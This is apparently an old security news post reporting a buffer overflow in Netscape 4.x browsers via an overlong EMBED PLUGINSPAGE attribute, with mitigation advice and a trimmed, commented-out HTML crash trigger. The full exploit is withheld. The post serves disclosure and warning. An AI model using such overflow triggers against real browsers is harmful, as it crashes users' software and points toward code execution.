A new security hole, caused by a buffer overflow bug has been discovered in at least some Netscape 4.x browsers.

The security hole, involving the use of the EMBED tag with a very long PLUGINSPAGE attribute leaves the victims machine vulnerable to any command execution. This means a hostile page can run arbitrary code in the browser and can inject a virus or trojans.

An example has been written and put online. The example overwrites the handling address of the access violation and the exploit code is called when the access violation is caused. The example was coded for Win98, but accordingly WinNT and Win95 contain the same problem. This is a serious problem that can't be avoided. Some have even stated that you should switch to other browsers before and until Netscape comes up with a fix and the least you should do if you use Netscape to read mail, is to make sure that HTML mail is disabled and if you can't do that, switch to other mail clients.

I will not post the location of the example pages with the exploit code, but a trimmed example that will not cause your computer any harm. If correctly executed, it could still crash your browser.

Note: The embed tag has to be on one line and the comment tags removed.

---------cut here-------

<HTML>

<HEAD>

<TITLE>Test</TITLE>

</HEAD>

<BODY>

<!-- EMBED SRC="netscape bug"

PLUGINSPAGE="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaa"

TYPE="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb

bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb

bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb" WIDTH="1500"

HEIGHT="1000"> </EMBED -->

</BODY>

</HTML>

---------cut here---------

Credits:

I first noticed it at web design forum's (mailing list), but later learned that it had been posted on Bugtraq last Thursday, this news flash is generated from both places.